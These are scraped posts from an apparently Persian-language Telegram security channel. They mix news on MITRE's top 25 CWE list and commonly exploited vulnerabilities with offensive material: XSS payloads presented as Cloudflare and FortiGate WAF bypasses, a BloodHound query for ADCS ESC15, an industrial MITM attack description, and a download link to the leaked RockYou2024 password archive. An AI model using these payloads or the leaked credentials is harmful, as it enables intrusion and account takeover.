CLOUDFLARE BYPASS xss
PAYLOAD:
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
FortiGate WAF bypass
<details open ontoggle="(()=>alertibrahimxss)()"></details>
#exploit #bypass
@pfkSecurity
PAYLOAD:
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
FortiGate WAF bypass
<details open ontoggle="(()=>alertibrahimxss)()"></details>
#exploit #bypass
@pfkSecurity
BloodHound ADCS ESC15 (EKUwu) cypher query.
از این جستجوی رمزگذاری برای بررسی حقوق ثبت نام در قالبهای گواهی استفاده کنید که الزامات حمله ADCS ESC15 (EKUwu) را که اخیراً فاش شده است را برآورده میکند.
@PfkSecurity
از این جستجوی رمزگذاری برای بررسی حقوق ثبت نام در قالبهای گواهی استفاده کنید که الزامات حمله ADCS ESC15 (EKUwu) را که اخیراً فاش شده است را برآورده میکند.
MATCH p=(:Base)-[:Enroll|AllExtendedRights]->(ct:CertTemplate)-[:PublishedTo]->(:EnterpriseCA)-[:TrustedForNTAuth]->(:NTAuthStore)-[:NTAuthStoreFor]->(:Domain)
WHERE ct.enrolleesuppliessubject = True
AND ct.authenticationenabled = False
AND ct.requiresmanagerapproval = False
AND ct.schemaversion = 1
RETURN p
@PfkSecurity
This media is not supported in your browser
VIEW IN TELEGRAM
این ویدئو یک سناریوی "MITM" را نشان می دهد که بین PLC و HMI انجام شده است. این وکتور حمله نشان می دهد که چگونه می توان کنترل کامل یک موتور (دستگاه نقطه پایانی) را به دست آورد. پس از مسموم کردن یا همون poisoning جدول arp HMI و درج مقادیر جعلی، مقادیر مطلوب را مستقیماً به PLC ارسال کردند تا نمایشی نادرست (مشابه نتایج حمله استاکس نت) ایجاد کنند.
@PfkSecurity
@PfkSecurity
P.F.K Security
Photo
۲۵ آسیبپذیری برتر CWE و برترین آسیبپذیریهای مورد بهرهبرداری معمول
در حالی که من در تعطیلات بودم، MITER 25 مورد از خطرناک ترین نقص های نرم افزاری را برای سال 2024 به روز کرد و CISA&Co بهترین آسیب پذیری های مورد سوء استفاده منظم را برای سال 2023 معرفی کرد .
25 top CWE 2024
در مقایسه با سال 2023 تغییرات زیادی در نقص های برتر نرم افزار وجود دارد. اول از همه، این ممکن است به دلیل تغییر در روش تجزیه و تحلیل باشد. در عین حال، نویسندگان تاکید میکنند که مشکلات پر کردن پایگاه داده NVD و خطاها در تعیین نقص نهایی CWE که باعث آسیبپذیری شده است، ممکن است بر دقت بالای ارائه شده تأثیر بگذارد، اما "به احتمال زیاد، همه چیز در حد خطای قابل قبول است."😅
میتوانید در مورد نتیجهگیریهای اصلی اینجا بیشتر بخوانید، و همچنین به شما توصیه میکنم به تحلیلهای مشابهی از شرکت DogeSec نگاه کنید، که آنها در پایان اکتبر انجام دادند (بالای آنها در صفحه دوم است) - تفاوتهایی با top MITER وجود دارد. ، اما قابل توجه نیست.
برای خودم، وارد شدن به نقصهای اصلی «افشای اطلاعات محرمانه به افراد غیرمجاز» (CWE-200) و «مصرف کنترلنشده منابع» (CWE-400) را برجسته کردم، که به ترتیب میتواند منجر به نشت و حملات DoS شود.😑
برترین آسیب پذیری های 2023 که به طور معمول مورد سوء استفاده قرار گرفته اند
این بار آسیبپذیریهایی که بهطور منظم/«هر روزه» مورد سوء استفاده قرار میگیرند شامل 15+32 آسیبپذیری است.
چیزهای جالب:
➡️ در میان 15 مورد برتر تنها یک آسیب پذیری در نرم افزار منبع باز (log4j) یافت می شود.
ما نباید در اینجا نتیجه بگیریم که نرم افزار منبع باز امن تر است، بلکه شرکت های ثروتمندی که از نرم افزار و سخت افزار اختصاصی استفاده می کنند بیشتر مورد حمله قرار می گیرند.
در عین حال، وجود یک آسیبپذیری 2021 در بالای 2023 نیز نشان میدهد که بسیاری از سازمانها هنوز نسخه لو رفتن log4j را دارند و در بهروزرسانی وابستگیها مشکل دارند.🥲
-> یک سوم آسیبپذیریها کد بهرهبرداری عمومی (در MetaSploit/Nuclei) ندارند.
-> بیش از یک سوم آسیبپذیریهای برتر، آسیبپذیریهای تجهیزات شبکه است.
اطلاعات دقیق در مورد آسیب پذیری های برتر را می توان در این مخزن یافت.
#vm #cve #mitre #cisa #cwe #vulnerability
@PfkSecurity
در حالی که من در تعطیلات بودم، MITER 25 مورد از خطرناک ترین نقص های نرم افزاری را برای سال 2024 به روز کرد و CISA&Co بهترین آسیب پذیری های مورد سوء استفاده منظم را برای سال 2023 معرفی کرد .
25 top CWE 2024
در مقایسه با سال 2023 تغییرات زیادی در نقص های برتر نرم افزار وجود دارد. اول از همه، این ممکن است به دلیل تغییر در روش تجزیه و تحلیل باشد. در عین حال، نویسندگان تاکید میکنند که مشکلات پر کردن پایگاه داده NVD و خطاها در تعیین نقص نهایی CWE که باعث آسیبپذیری شده است، ممکن است بر دقت بالای ارائه شده تأثیر بگذارد، اما "به احتمال زیاد، همه چیز در حد خطای قابل قبول است."😅
میتوانید در مورد نتیجهگیریهای اصلی اینجا بیشتر بخوانید، و همچنین به شما توصیه میکنم به تحلیلهای مشابهی از شرکت DogeSec نگاه کنید، که آنها در پایان اکتبر انجام دادند (بالای آنها در صفحه دوم است) - تفاوتهایی با top MITER وجود دارد. ، اما قابل توجه نیست.
برای خودم، وارد شدن به نقصهای اصلی «افشای اطلاعات محرمانه به افراد غیرمجاز» (CWE-200) و «مصرف کنترلنشده منابع» (CWE-400) را برجسته کردم، که به ترتیب میتواند منجر به نشت و حملات DoS شود.😑
برترین آسیب پذیری های 2023 که به طور معمول مورد سوء استفاده قرار گرفته اند
این بار آسیبپذیریهایی که بهطور منظم/«هر روزه» مورد سوء استفاده قرار میگیرند شامل 15+32 آسیبپذیری است.
چیزهای جالب:
➡️ در میان 15 مورد برتر تنها یک آسیب پذیری در نرم افزار منبع باز (log4j) یافت می شود.
ما نباید در اینجا نتیجه بگیریم که نرم افزار منبع باز امن تر است، بلکه شرکت های ثروتمندی که از نرم افزار و سخت افزار اختصاصی استفاده می کنند بیشتر مورد حمله قرار می گیرند.
در عین حال، وجود یک آسیبپذیری 2021 در بالای 2023 نیز نشان میدهد که بسیاری از سازمانها هنوز نسخه لو رفتن log4j را دارند و در بهروزرسانی وابستگیها مشکل دارند.🥲
-> یک سوم آسیبپذیریها کد بهرهبرداری عمومی (در MetaSploit/Nuclei) ندارند.
-> بیش از یک سوم آسیبپذیریهای برتر، آسیبپذیریهای تجهیزات شبکه است.
اطلاعات دقیق در مورد آسیب پذیری های برتر را می توان در این مخزن یافت.
#vm #cve #mitre #cisa #cwe #vulnerability
@PfkSecurity
یک لیست عالی از Security for IoT and Embedded Systems:
☢️ https://github.com/phodal/awesome-iot
☢️ https://github.com/nebgnahz/awesome-iot-hacks
☢️ https://github.com/nutc4k3/amazing-iot-security
☢️ https://github.com/fkie-cad/awesome-embedded-and-iot-security
#IoT
@PfkSecurity
☢️ https://github.com/phodal/awesome-iot
☢️ https://github.com/nebgnahz/awesome-iot-hacks
☢️ https://github.com/nutc4k3/amazing-iot-security
☢️ https://github.com/fkie-cad/awesome-embedded-and-iot-security
#IoT
@PfkSecurity
GitHub
GitHub - phodal/awesome-iot: Awesome IoT. A collaborative list of great resources about IoT Framework, Library, OS, Platform
Awesome IoT. A collaborative list of great resources about IoT Framework, Library, OS, Platform - phodal/awesome-iot
This media is not supported in your browser
VIEW IN TELEGRAM
💡 چگونه احراز هویت Kerberos در مورد روابط اعتماد دو طرفه متقابل دامنه کار می کند
#windows #cheatsheet
@PfkSecurity
#windows #cheatsheet
@PfkSecurity
آرشیو RockYou2024 در شبکه ظاهر شده است که به صورت آرشیو شده 45 گیگابایت حجم دارد (وزن بسته بندی نشده 156 گیگابایت)
📦 دانلود و استفاده کنید: https://s3.timeweb.cloud/fd51ce25-6f95e3f8-263a-4b13-92af-12bc265adb44/rockyou2024.zip
#leak #security
@PfkSecurity
📦 دانلود و استفاده کنید: https://s3.timeweb.cloud/fd51ce25-6f95e3f8-263a-4b13-92af-12bc265adb44/rockyou2024.zip
#leak #security
@PfkSecurity
This media is not supported in your browser
VIEW IN TELEGRAM
🔐 چگونه احراز هویت Kerberos هنگامی که سرویس برای تفویض اختیار بدون محدودیت پیکربندی شده است کار می کند
#cheatsheet #redteam #pentest
@pfksecurity
#cheatsheet #redteam #pentest
@pfksecurity